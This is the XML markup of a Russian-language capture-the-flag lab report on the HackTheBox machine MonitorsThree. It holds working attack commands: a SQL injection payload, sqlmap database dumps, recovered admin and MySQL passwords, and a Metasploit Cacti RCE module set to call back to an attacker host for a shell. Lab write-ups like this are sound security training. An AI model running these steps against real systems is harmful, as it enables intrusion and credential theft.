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3.png" ContentType="image/png"/>
  <Override PartName="/word/media/image4.png" ContentType="image/png"/>
  <Override PartName="/word/media/image9.png" ContentType="image/png"/>
  <Override PartName="/word/media/image18.png" ContentType="image/png"/>
  <Override PartName="/word/media/image14.png" ContentType="image/png"/>
  <Override PartName="/word/media/image5.png" ContentType="image/png"/>
  <Override PartName="/word/media/image15.png" ContentType="image/png"/>
  <Override PartName="/word/media/image6.png" ContentType="image/png"/>
  <Override PartName="/word/media/image10.png" ContentType="image/png"/>
  <Override PartName="/word/media/image1.png" ContentType="image/png"/>
  <Override PartName="/word/media/image16.png" ContentType="image/png"/>
  <Override PartName="/word/media/image7.png" ContentType="image/png"/>
  <Override PartName="/word/media/image11.png" ContentType="image/png"/>
  <Override PartName="/word/media/image2.png" ContentType="image/png"/>
  <Override PartName="/word/media/image17.png" ContentType="image/png"/>
  <Override PartName="/word/media/image8.png" ContentType="image/png"/>
  <Override PartName="/word/media/image12.png" ContentType="image/png"/>
  <Override PartName="/word/media/image3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center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b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>MonitorsThree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0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В данной лабараторной работе я буду действовать по следующему алгоритму:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Разведка;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Сканирование;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Эксплуатация уязвимостей;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Получение доступа;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Повышение привелегий;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Скачивание полезной информации (окончание работы).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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star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 xml:space="preserve">1 Этап </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Разведка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ab/>
        <w:t xml:space="preserve">Ip адрес уязвимой машины MonitorsThree – 10.10.11.30, мой IP адрес – 10.10.14.190 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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start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/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2 Этап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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Сканирование</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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 xml:space="preserve">Для поиска открытых портов я буду использовать инструмент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap. 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Воспользовавшись командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap -sS -sV --top-ports=10000 -T4 -v -oN MonitorsThreeNmapScan.nmap 10.10.11.30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, я получил следующие результаты:</w:t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151890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151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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Текстовый вид результатов nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(MonitorsThreeNmapScan.nmap):</w:t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# Nmap 7.94SVN scan initiated Tue Dec  3 10:01:15 2024 as: /usr/lib/nmap/nmap --privileged -sS -sV --top-ports=10000 -T4 -v -oN MonitorsThreeNmapScan.nmap 10.10.11.30</w:t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Nmap scan report for 10.10.11.30</w:t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Host is up (0.10s latency).</w:t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Not shown: 8365 closed tcp ports (reset)</w:t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PORT     STATE    SERVICE VERSION</w:t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22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)</w:t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80/tcp   open     http    nginx 1.18.0 (Ubuntu)</w:t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8084/tcp filtered websnp</w:t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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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Read data files from: /usr/share/nmap</w:t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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t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# Nmap done at Tue Dec  3 10:01:38 2024 -- 1 IP address (1 host up) scanned in 23.32 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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 xml:space="preserve">Из результатов видно, что на уязвимой машине открыто два порта и один фильтруется, возможно, на нем запущен внутренний сервис. Порт 80 вселяет надежды, но, для начала, добавлю IP адрес в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/etc/hosts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:</w:t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384040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384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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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 xml:space="preserve">После добавления данных в /etc/hosts и перехода по </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ссылке</w:t>
        </w:r>
      </w:hyperlink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в браузере я попал на следующую страницу:</w:t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861435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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8614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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/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Анализ веб-сайта:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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Файл robots.txt: не найден;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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Исходный код главной страницы: подсказок или странных файлов, данных не содержит;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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Поиск доменов: с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster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найдено несколько доменов, но доступ к ним заблокирован</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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Поиск поддоменов: с помощью инструмента </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf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и команды f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">fuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://monitorsthree.htb -H "Host: FUZZ.monitorsthree.htb" -fc 200,403 -t 200 -o MonitorsTreeFfufScan.txt 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был найден поддомен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cacti :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="720"/>
        <w:jc w:val="start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03620" cy="4226560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="4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4226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Добавлю его в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и открою:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="720"/>
        <w:jc w:val="start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03620" cy="3722370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="5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3722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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Отсюда можно извлечь CMS – Cacti и версию – 1.2.26 .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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Дополнительно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr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Существует два поля для пользовательского ввода:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://monitorsthree.htb/login.php</w:t>
        </w:r>
      </w:hyperlink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– Форма для входа пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://monitorsthree.htb/forgot_password.php</w:t>
        </w:r>
      </w:hyperlink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– Форма для восстановления пароля:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr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Я решил попробовать ввести несколько полезных нагрузок.Первая же из них (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tester'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)выдала результат:</w:t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461010</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>229870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5646420" cy="3443605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="6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420" cy="3443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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/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</w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr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Похоже, что сайт уязвим к SQL нъекции, используется MariaDB и MySql. После нескольких нагрузок мне удалось найти рабочую: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin' AND 1=1 -- -</w:t>
      </w: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</w:rPr>
        <w:t xml:space="preserve">. Отсюда следует, что это Boolean SQLi.  С помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w: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</w:rPr>
        <w:t xml:space="preserve"> я перехватил запрос и записал его в файл. Воспользовавшись командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r sqli.txt --dbms=mysql --level=3 --risk=3 –dbs </w:t>
      </w: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</w:rPr>
        <w:t>, я извлек имена таблиц.</w:t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218305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="7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218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ab/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24225" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="8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628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>Доступные базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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information_schema;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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monitorsthree_db</w:t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Для меня интересна вторая база данных. Найду все ее таблицы. Для этого я использовал команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap -r sqli.txt --dbms=mysql --level=3 --risk=3 -D monitorstree_db --dump-all –batch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start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Доступные таблицы из monitorsthree_db:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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form_definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr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primarytest</w:t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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Из базы данных я извлек данные админа(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin:greencacti2001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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Этапы 3 и 4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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Эксплуатация уязвимостей и получение доступа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Итак, у меня есть версия CMS, учетные данные администратора. C помощью этих данных я вошел в систему. Также я нашел уязвимость Cacti 1.2.26 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2024-25641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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эксплоит доступен в метасплоит. </w:t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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порядок эксплуатации:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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msfconsole;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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search cacti;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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use 3 or use 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multi/http/cacti_package_import_rce ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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show options;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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set RHOSTS cacti.monitorsthree.htb;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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set PASSWORD greencacti2001;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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set LHOST &lt;attacker-ip&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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set TARGET 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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run;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false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spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr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ab/>
        <w:t>Эксплоит может не запуститься с первого раза, в этом случае необходимо просто перезапустить. Лично у меня все заработало с 5 раза.</w:t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56610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="9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56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ab/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ab/>
        <w:t xml:space="preserve">Данные пользователей должны где-то храниться, система уязвима к sql инъекции, значит, по логике, присутствует система управления базами данных. С целью проверить это я отправился в </w:t>
      </w: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  <w:t>/var/www/html/cacti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 . Здесь я нашел директорию </w:t>
      </w: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  <w:t>include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 и в ней файл </w:t>
      </w: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config.php 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. Здесь я нашел учетные данные пользователя mysql: </w:t>
      </w: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  <w:t>cactiuser:cactiuser :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="star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175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="10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175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  <w:tab/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При сканировании nmap порт 3306 помечался как закрытый, в тоже время доступна база данных.Значит MySql развернута во внутренней сети. Метерпретер не дал мне подключиться.</w:t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ab/>
      </w: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  <w:t>Мои дальнейшие действия:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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shell;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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python3 -c "import pty; pty.spawn('/bin/bash')";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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mysql -u cactiuser -p;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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ввёл пароль cactiuser;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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SHOW databases;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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USE cacti;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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SHOW tables;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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SELECT * FROM user_auth;</w:t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ab/>
        <w:t>Здесь я нашел данные еще одного пользователя:</w:t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175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="11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175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ab/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ab/>
